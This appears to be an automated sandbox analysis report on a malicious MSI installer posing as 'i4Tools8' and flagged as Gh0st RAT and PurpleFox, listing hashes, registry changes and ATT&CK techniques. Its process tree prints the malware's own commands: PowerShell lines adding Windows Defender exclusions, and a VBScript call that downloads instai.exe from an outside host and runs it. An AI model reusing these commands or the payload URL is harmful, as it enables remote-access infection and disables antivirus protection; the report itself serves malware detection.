gh0strat | 8e91a24111e14ac5cec2ee91633098ddc8606ee51d13b0c9d0f6087d597a189b

Analysis

max time kernel
133s
max time network
159s
platform
windows10-2004_x64
resource
win10v2004-20240802-en
resource tags

arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
submitted
14/09/2024, 08:11

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

zuixinaisi.msi
Size

233.8MB
MD5

df0ddca33d18cef60dbfdad992a21ff3
SHA1

5db0a225c9713d93412d01c5df5398811e54d1e5
SHA256

8e91a24111e14ac5cec2ee91633098ddc8606ee51d13b0c9d0f6087d597a189b
SHA512

e217e0425cb0045bc15e4ed5e122e69bd4d6bee5170e961659aba94641305f6a274d648529ec577df41fcca383085cf31e9df66123e433dd2f6a408aa407ceda
SSDEEP

6291456:/LGfwiT1I66Fm7gHvhjLvuYGpyLit5vFls1D:/cT1I6CFbopyLiLvyD

Score

10^/10

gh0strat purplefox defense_evasion discovery execution persistence privilege_escalation rat rootkit trojan

Malware Config

Signatures

Detect PurpleFox Rootkit 1 IoCs

Detect PurpleFox Rootkit.

rootkit

resource	yara_rule
behavioral2/memory/3484-131-0x0000000010000000-0x0000000010199000-memory.dmp	purplefox_rootkit

Gh0st RAT payload 1 IoCs

resource	yara_rule
behavioral2/memory/3484-131-0x0000000010000000-0x0000000010199000-memory.dmp	family_gh0strat

Gh0strat
Gh0st RAT is a remote access tool (RAT) with its source code public and it has been used by multiple Chinese groups.
rat gh0strat
PurpleFox
PurpleFox is an exploit kit used to distribute other malware families and first seen in 2018.
rootkit trojan purplefox

Blocklisted process makes network request 1 IoCs

flow	pid	Process
31	2808	WScript.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
4808	powershell.exe
4564	powershell.exe

Downloads MZ/PE file

Enumerates connected drives 3 TTPs 64 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\P:	msiexec.exe
File opened (read-only)	\??\E:	instai.exe
File opened (read-only)	\??\K:	instai.exe
File opened (read-only)	\??\W:	msiexec.exe
File opened (read-only)	\??\Z:	msiexec.exe
File opened (read-only)	\??\N:	msiexec.exe
File opened (read-only)	\??\S:	msiexec.exe
File opened (read-only)	\??\Y:	msiexec.exe
File opened (read-only)	\??\H:	instai.exe
File opened (read-only)	\??\I:	instai.exe
File opened (read-only)	\??\M:	msiexec.exe
File opened (read-only)	\??\U:	msiexec.exe
File opened (read-only)	\??\T:	msiexec.exe
File opened (read-only)	\??\G:	msiexec.exe
File opened (read-only)	\??\Q:	msiexec.exe
File opened (read-only)	\??\W:	msiexec.exe
File opened (read-only)	\??\X:	msiexec.exe
File opened (read-only)	\??\Z:	msiexec.exe
File opened (read-only)	\??\G:	msiexec.exe
File opened (read-only)	\??\I:	msiexec.exe
File opened (read-only)	\??\R:	instai.exe
File opened (read-only)	\??\R:	msiexec.exe
File opened (read-only)	\??\H:	msiexec.exe
File opened (read-only)	\??\I:	msiexec.exe
File opened (read-only)	\??\U:	instai.exe
File opened (read-only)	\??\W:	instai.exe
File opened (read-only)	\??\X:	instai.exe
File opened (read-only)	\??\J:	msiexec.exe
File opened (read-only)	\??\Y:	msiexec.exe
File opened (read-only)	\??\Q:	msiexec.exe
File opened (read-only)	\??\X:	msiexec.exe
File opened (read-only)	\??\A:	msiexec.exe
File opened (read-only)	\??\E:	msiexec.exe
File opened (read-only)	\??\V:	msiexec.exe
File opened (read-only)	\??\Q:	instai.exe
File opened (read-only)	\??\L:	msiexec.exe
File opened (read-only)	\??\P:	msiexec.exe
File opened (read-only)	\??\P:	instai.exe
File opened (read-only)	\??\N:	instai.exe
File opened (read-only)	\??\O:	instai.exe
File opened (read-only)	\??\G:	instai.exe
File opened (read-only)	\??\B:	msiexec.exe
File opened (read-only)	\??\O:	msiexec.exe
File opened (read-only)	\??\K:	msiexec.exe
File opened (read-only)	\??\T:	msiexec.exe
File opened (read-only)	\??\L:	instai.exe
File opened (read-only)	\??\M:	instai.exe
File opened (read-only)	\??\S:	instai.exe
File opened (read-only)	\??\Z:	instai.exe
File opened (read-only)	\??\V:	msiexec.exe
File opened (read-only)	\??\E:	msiexec.exe
File opened (read-only)	\??\M:	msiexec.exe
File opened (read-only)	\??\H:	msiexec.exe
File opened (read-only)	\??\J:	msiexec.exe
File opened (read-only)	\??\L:	msiexec.exe
File opened (read-only)	\??\U:	msiexec.exe
File opened (read-only)	\??\T:	instai.exe
File opened (read-only)	\??\V:	instai.exe
File opened (read-only)	\??\N:	msiexec.exe
File opened (read-only)	\??\R:	msiexec.exe
File opened (read-only)	\??\S:	msiexec.exe
File opened (read-only)	\??\J:	instai.exe
File opened (read-only)	\??\A:	msiexec.exe
File opened (read-only)	\??\B:	msiexec.exe

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\International\Geo\Nation	MSID09F.tmp
Key value queried	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\International\Geo\Nation	cmd.exe

Drops file in Windows directory 14 IoCs

description	ioc	Process
File opened for modification	C:\Windows\Installer\MSID09F.tmp	msiexec.exe
File created	C:\Windows\Installer\e58c766.msi	msiexec.exe
File opened for modification	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log	msiexec.exe
File opened for modification	C:\Windows\Installer\MSICB0E.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSICC67.tmp	msiexec.exe
File created	C:\Windows\Installer\inprogressinstallinfo.ipi	msiexec.exe
File opened for modification	C:\Windows\Installer\MSID06F.tmp	msiexec.exe
File created	C:\Windows\Installer\e58c762.msi	msiexec.exe
File created	C:\Windows\Installer\SourceHash{8E2E1E95-E5EE-4019-BB11-82391D9CA4BD}	msiexec.exe
File opened for modification	C:\Windows\Installer\e58c762.msi	msiexec.exe
File opened for modification	C:\Windows\Installer\MSICA03.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIC86C.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSICAA0.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\	msiexec.exe

Executes dropped EXE 2 IoCs

pid	Process
4924	MSID09F.tmp
3484	instai.exe

Loads dropped DLL 5 IoCs

pid	Process
112	MsiExec.exe
112	MsiExec.exe
112	MsiExec.exe
112	MsiExec.exe
112	MsiExec.exe

Access Token Manipulation: Create Process with Token 1 TTPs 1 IoCs

defense_evasion privilege_escalation

Create Process with Token

T1134.002

pid	Process
4924	MSID09F.tmp

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Installer Packages 2 TTPs 1 IoCs

persistence privilege_escalation

Installer Packages

T1546.016

Msiexec

T1218.007

pid	Process
3040	msiexec.exe

System Location Discovery: System Language Discovery 1 TTPs 7 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	instai.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MsiExec.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MSID09F.tmp
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe

Checks SCSI registry key(s) 3 TTPs 5 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
Set value (data)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr\PartitionTableCache = 0000000004000000f7b83aff83bcb26e0000000000000000000000000000000000000000000000000000000000000000000000000000000000001000000000000000c01200000000ffffffff000000002701010000080000f7b83aff0000000000001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000d01200000000000020ed3a000000ffffffff000000000700010000680900f7b83aff000000000000d012000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000f0ff3a0000000000000005000000ffffffff000000000700010000f87f1df7b83aff000000000000f0ff3a00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff000000000000000000000000f7b83aff00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000	vssvc.exe
Set value (data)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr\SnapshotDataCache = 534e41505041525401000000700000008ec7416a0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000	vssvc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters	vssvc.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters	vssvc.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr	vssvc.exe

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	instai.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	instai.exe

Modifies data under HKEY_USERS 3 IoCs

description	ioc	Process
Key deleted	\REGISTRY\USER\.DEFAULT\SOFTWARE\CLASSES\LOCAL SETTINGS\MUICACHE\26\52C64B7E	msiexec.exe
Key deleted	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26	msiexec.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\27	msiexec.exe

Modifies registry class 24 IoCs

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\59E1E2E8EE5E9104BB112893D1C94ADB\InstanceType = "0"	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\C1B40AE142F817A4388DE97327B1C387	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\C1B40AE142F817A4388DE97327B1C387\59E1E2E8EE5E9104BB112893D1C94ADB	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\59E1E2E8EE5E9104BB112893D1C94ADB\SourceList	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\59E1E2E8EE5E9104BB112893D1C94ADB\SourceList\PackageName = "zuixinaisi.msi"	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\59E1E2E8EE5E9104BB112893D1C94ADB\SourceList\Net	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\59E1E2E8EE5E9104BB112893D1C94ADB\SourceList\Net\1 = "C:\\Users\\Admin\\AppData\\Local\\Temp\\"	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\59E1E2E8EE5E9104BB112893D1C94ADB\Language = "2052"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\59E1E2E8EE5E9104BB112893D1C94ADB\SourceList\LastUsedSource = "n;1;C:\\Users\\Admin\\AppData\\Local\\Temp\\"	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\59E1E2E8EE5E9104BB112893D1C94ADB\SourceList\Media	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\59E1E2E8EE5E9104BB112893D1C94ADB\Version = "16777216"	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\59E1E2E8EE5E9104BB112893D1C94ADB\DeploymentFlags = "3"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\59E1E2E8EE5E9104BB112893D1C94ADB\ProductName = "i4Tools8"	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\59E1E2E8EE5E9104BB112893D1C94ADB\Assignment = "1"	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\59E1E2E8EE5E9104BB112893D1C94ADB\AdvertiseFlags = "388"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\59E1E2E8EE5E9104BB112893D1C94ADB\SourceList\Media\1 = ";"	msiexec.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\59E1E2E8EE5E9104BB112893D1C94ADB\Clients = 3a0000000000	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\59E1E2E8EE5E9104BB112893D1C94ADB	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\59E1E2E8EE5E9104BB112893D1C94ADB	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\59E1E2E8EE5E9104BB112893D1C94ADB\PackageCode = "D28B5C34E3416EF469BDECBAE57D671B"	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\59E1E2E8EE5E9104BB112893D1C94ADB\AuthorizedLUAApp = "0"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\59E1E2E8EE5E9104BB112893D1C94ADB\SourceList\Media\DiskPrompt = "[1]"	msiexec.exe
Key created	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000_Classes\Local Settings	cmd.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\59E1E2E8EE5E9104BB112893D1C94ADB\MainFeature	msiexec.exe

Script User-Agent 1 IoCs

Uses user-agent string associated with script host/environment.

description	flow	ioc
HTTP User-Agent header	31	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
4652	msiexec.exe
4652	msiexec.exe
4808	powershell.exe
4808	powershell.exe
4808	powershell.exe
4564	powershell.exe
4564	powershell.exe
4564	powershell.exe
3484	instai.exe
3484	instai.exe
3484	instai.exe
3484	instai.exe
3484	instai.exe
3484	instai.exe
3484	instai.exe
3484	instai.exe
3484	instai.exe
3484	instai.exe
3484	instai.exe
3484	instai.exe
3484	instai.exe
3484	instai.exe
3484	instai.exe
3484	instai.exe
3484	instai.exe
3484	instai.exe
3484	instai.exe
3484	instai.exe
3484	instai.exe
3484	instai.exe
3484	instai.exe
3484	instai.exe
3484	instai.exe
3484	instai.exe
3484	instai.exe
3484	instai.exe
3484	instai.exe
3484	instai.exe
3484	instai.exe
3484	instai.exe
3484	instai.exe
3484	instai.exe
3484	instai.exe
3484	instai.exe
3484	instai.exe
3484	instai.exe
3484	instai.exe
3484	instai.exe
3484	instai.exe
3484	instai.exe
3484	instai.exe
3484	instai.exe
3484	instai.exe
3484	instai.exe
3484	instai.exe
3484	instai.exe
3484	instai.exe
3484	instai.exe
3484	instai.exe
3484	instai.exe
3484	instai.exe
3484	instai.exe
3484	instai.exe
3484	instai.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeShutdownPrivilege	3040	msiexec.exe
Token: SeIncreaseQuotaPrivilege	3040	msiexec.exe
Token: SeSecurityPrivilege	4652	msiexec.exe
Token: SeCreateTokenPrivilege	3040	msiexec.exe
Token: SeAssignPrimaryTokenPrivilege	3040	msiexec.exe
Token: SeLockMemoryPrivilege	3040	msiexec.exe
Token: SeIncreaseQuotaPrivilege	3040	msiexec.exe
Token: SeMachineAccountPrivilege	3040	msiexec.exe
Token: SeTcbPrivilege	3040	msiexec.exe
Token: SeSecurityPrivilege	3040	msiexec.exe
Token: SeTakeOwnershipPrivilege	3040	msiexec.exe
Token: SeLoadDriverPrivilege	3040	msiexec.exe
Token: SeSystemProfilePrivilege	3040	msiexec.exe
Token: SeSystemtimePrivilege	3040	msiexec.exe
Token: SeProfSingleProcessPrivilege	3040	msiexec.exe
Token: SeIncBasePriorityPrivilege	3040	msiexec.exe
Token: SeCreatePagefilePrivilege	3040	msiexec.exe
Token: SeCreatePermanentPrivilege	3040	msiexec.exe
Token: SeBackupPrivilege	3040	msiexec.exe
Token: SeRestorePrivilege	3040	msiexec.exe
Token: SeShutdownPrivilege	3040	msiexec.exe
Token: SeDebugPrivilege	3040	msiexec.exe
Token: SeAuditPrivilege	3040	msiexec.exe
Token: SeSystemEnvironmentPrivilege	3040	msiexec.exe
Token: SeChangeNotifyPrivilege	3040	msiexec.exe
Token: SeRemoteShutdownPrivilege	3040	msiexec.exe
Token: SeUndockPrivilege	3040	msiexec.exe
Token: SeSyncAgentPrivilege	3040	msiexec.exe
Token: SeEnableDelegationPrivilege	3040	msiexec.exe
Token: SeManageVolumePrivilege	3040	msiexec.exe
Token: SeImpersonatePrivilege	3040	msiexec.exe
Token: SeCreateGlobalPrivilege	3040	msiexec.exe
Token: SeBackupPrivilege	4544	vssvc.exe
Token: SeRestorePrivilege	4544	vssvc.exe
Token: SeAuditPrivilege	4544	vssvc.exe
Token: SeBackupPrivilege	4652	msiexec.exe
Token: SeRestorePrivilege	4652	msiexec.exe
Token: SeRestorePrivilege	4652	msiexec.exe
Token: SeTakeOwnershipPrivilege	4652	msiexec.exe
Token: SeRestorePrivilege	4652	msiexec.exe
Token: SeTakeOwnershipPrivilege	4652	msiexec.exe
Token: SeRestorePrivilege	4652	msiexec.exe
Token: SeTakeOwnershipPrivilege	4652	msiexec.exe
Token: SeRestorePrivilege	4652	msiexec.exe
Token: SeTakeOwnershipPrivilege	4652	msiexec.exe
Token: SeRestorePrivilege	4652	msiexec.exe
Token: SeTakeOwnershipPrivilege	4652	msiexec.exe
Token: SeRestorePrivilege	4652	msiexec.exe
Token: SeTakeOwnershipPrivilege	4652	msiexec.exe
Token: SeRestorePrivilege	4652	msiexec.exe
Token: SeTakeOwnershipPrivilege	4652	msiexec.exe
Token: SeRestorePrivilege	4652	msiexec.exe
Token: SeTakeOwnershipPrivilege	4652	msiexec.exe
Token: SeRestorePrivilege	4652	msiexec.exe
Token: SeTakeOwnershipPrivilege	4652	msiexec.exe
Token: SeDebugPrivilege	4808	powershell.exe
Token: SeRestorePrivilege	4652	msiexec.exe
Token: SeTakeOwnershipPrivilege	4652	msiexec.exe
Token: SeRestorePrivilege	4652	msiexec.exe
Token: SeTakeOwnershipPrivilege	4652	msiexec.exe
Token: SeRestorePrivilege	4652	msiexec.exe
Token: SeTakeOwnershipPrivilege	4652	msiexec.exe
Token: SeRestorePrivilege	4652	msiexec.exe
Token: SeTakeOwnershipPrivilege	4652	msiexec.exe

Suspicious use of FindShellTrayWindow 2 IoCs

pid	Process
3040	msiexec.exe
3040	msiexec.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
3484	instai.exe

Suspicious use of WriteProcessMemory 23 IoCs

description	pid	Process	procid_target
PID 4652 wrote to memory of 644	4652	msiexec.exe	107
PID 4652 wrote to memory of 644	4652	msiexec.exe	107
PID 4652 wrote to memory of 112	4652	msiexec.exe	109
PID 4652 wrote to memory of 112	4652	msiexec.exe	109
PID 4652 wrote to memory of 112	4652	msiexec.exe	109
PID 4652 wrote to memory of 4924	4652	msiexec.exe	110
PID 4652 wrote to memory of 4924	4652	msiexec.exe	110
PID 4652 wrote to memory of 4924	4652	msiexec.exe	110
PID 4924 wrote to memory of 5048	4924	MSID09F.tmp	111
PID 4924 wrote to memory of 5048	4924	MSID09F.tmp	111
PID 4924 wrote to memory of 5048	4924	MSID09F.tmp	111
PID 5048 wrote to memory of 4808	5048	cmd.exe	113
PID 5048 wrote to memory of 4808	5048	cmd.exe	113
PID 5048 wrote to memory of 4808	5048	cmd.exe	113
PID 5048 wrote to memory of 4564	5048	cmd.exe	115
PID 5048 wrote to memory of 4564	5048	cmd.exe	115
PID 5048 wrote to memory of 4564	5048	cmd.exe	115
PID 5048 wrote to memory of 2808	5048	cmd.exe	116
PID 5048 wrote to memory of 2808	5048	cmd.exe	116
PID 5048 wrote to memory of 2808	5048	cmd.exe	116
PID 5048 wrote to memory of 3484	5048	cmd.exe	119
PID 5048 wrote to memory of 3484	5048	cmd.exe	119
PID 5048 wrote to memory of 3484	5048	cmd.exe	119

Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

C:\Windows\system32\msiexec.exe
msiexec.exe /I C:\Users\Admin\AppData\Local\Temp\zuixinaisi.msi
1⤵
- Enumerates connected drives
- Event Triggered Execution: Installer Packages
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:3040

C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
1⤵
- Enumerates connected drives
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4652
- C:\Windows\system32\srtasks.exe
  C:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:2
  2⤵
  PID:644
- C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding 9781470C31F07C43A7C9ADE697C0B704
  2⤵
  - Loads dropped DLL
  - System Location Discovery: System Language Discovery
  PID:112
- C:\Windows\Installer\MSID09F.tmp
  "C:\Windows\Installer\MSID09F.tmp" /DontWait /RunAsAdmin /HideWindow "C:\ProgramData\i4Tools8.bat"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Access Token Manipulation: Create Process with Token
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:4924
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /C ""C:\ProgramData\i4Tools8.bat" "
    3⤵
    - Checks computer location settings
    - System Location Discovery: System Language Discovery
    - Modifies registry class
    - Suspicious use of WriteProcessMemory
    PID:5048
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell Add-MpPreference -ExclusionPath "C:\ProgramData/instai.exe
      4⤵
      Command and Scripting Interpreter: PowerShell
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4808
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell Add-MpPreference -ExclusionPath "C:\ProgramData
      4⤵
      Command and Scripting Interpreter: PowerShell
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      PID:4564
  - - C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\ProgramData\DownloadFile.vbs" "https://vipusfsk.com/instai.exe" "C:/ProgramData\instai.exe"
      4⤵
      Blocklisted process makes network request
      System Location Discovery: System Language Discovery
      PID:2808
  - - C:\ProgramData\instai.exe
      C:/ProgramData/instai.exe
      4⤵
      Enumerates connected drives
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      Checks processor information in registry
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of SetWindowsHookEx
      PID:3484

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Checks SCSI registry key(s)
- Suspicious use of AdjustPrivilegeToken
PID:4544

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Event Triggered Execution

T1546

Installer Packages

T1546.016

Privilege Escalation

Access Token Manipulation

T1134

Create Process with Token

T1134.002

Event Triggered Execution

T1546

Installer Packages

T1546.016

Defense Evasion

Access Token Manipulation

T1134

Create Process with Token

T1134.002

System Binary Proxy Execution

T1218

Msiexec

T1218.007

Credential Access

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Config.Msi\e58c765.rbs

Filesize
8KB

MD5
b9e0793acf2cab3acdae1376e71b88fc

SHA1
cbaa88dfa1b9026c3325d1d8b774786d9966a88d

SHA256
fe9b8bb495ede5eafa0b17a114ef3e47e84dfec2b2c51117dd5b5218626573e1

SHA512
20828ea6603ac4feb64bea2901b4f457e6a7a75c6c884d37a24f222536f5fa5a57086068737d805e9d0d14aedcdbae933b7d12c34b435ef8154036f461c2335e

Download Submit
C:\ProgramData\DownloadFile.vbs

Filesize
407B

MD5
2ff09853906bcaed82ddb57baca8eb1f

SHA1
95bf628e54a9eff2ac434fedc78193846def0139

SHA256
591a03bf9ca7daa56aa6fec2e008a9a5aa68bb4f9f25ae23f905ab79de23d795

SHA512
b6e7a58de13e6a3d760e769183921cc3658398c405d39f19cb4d26ab03b6898f3cf011391f1aaa9db9358d40131bd67e7a7df46cc8ff4298e4641232a078d740

Download Submit
C:\ProgramData\i4Tools8.bat

Filesize
1KB

MD5
10e4067312ac3173043783d46c328a99

SHA1
ec03017d71370619f553cd77b615ef6e2c781ff3

SHA256
048183e68c0f8526ad8ce2e0c61ecbe50f42eacf990e8e4026254b154d0ba4bf

SHA512
1f7799c14386c8bf3e65146f543e96052e809a55df9431b8b5baaef677218f870d35d963ef71f17cdfeb773f418a7e9a96ac68c851929ecd7a25e32954e35cd3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
968cb9309758126772781b83adb8a28f

SHA1
8da30e71accf186b2ba11da1797cf67f8f78b47c

SHA256
92099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a

SHA512
4bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
18KB

MD5
d14a1ef6ec7803a9a20c73d916e235b1

SHA1
5c6fec8d4531fb4240cd064197cdf05e53e09dd4

SHA256
0d3979b1f41879e417cf467eea8639d5d409bbbba49b0dabe6c9f0e5ab053b71

SHA512
339b6ad8db6b33912e4f50380047946a51e3e4ce6ea6332997467ae8322f96e5e8d501c44c26617716aad7ff3cff8ccdce24a18d78e92de4cd142b68727c96ad

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_cbthmjnf.sv5.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Windows\Installer\MSIC86C.tmp

Filesize
587KB

MD5
c7fbd5ee98e32a77edf1156db3fca622

SHA1
3e534fc55882e9fb940c9ae81e6f8a92a07125a0

SHA256
e140990b509dd6884a5742bde64f2cdaa10012d472b0b32de43ebecbc83242b6

SHA512
8691ac8b214cc1e4f34a3ab2bbc0c2391f7f11ebbe5db0dc82825195b5fe5a05310ed1e14d253a9b74a64050d2f2a6623dd2fcd912f80fef51e51845ef1e3a1a

Download Submit
C:\Windows\Installer\MSID09F.tmp

Filesize
419KB

MD5
cac0eaeb267d81cf3fa968ee23a6af9d

SHA1
cf6ae8e44fb4949d5f0b01b110eaba49d39270a2

SHA256
f1dd0dd1e83b28ffa2ed30f46f98e94a4919ec1f4e9d33720354288b77153774

SHA512
8edf9f733dda9000a6e2b70da61912dbc15f74c836d738391ceddcdff20f5b420a678450523cf331aa9bce90217aa92ac6e73d1880ae15c9842ccc7d3296f95b

Download Submit
\??\GLOBALROOT\Device\HarddiskVolumeShadowCopy2\System Volume Information\SPP\metadata-2

Filesize
23.7MB

MD5
2097108849978c6e9f1fc140c871858c

SHA1
5ce14933e0a1d45745e636b96533638278746553

SHA256
c30765d285fe45cab3ea9417df3fbdccfcf64da4b255595dfdf86b9e361881f6

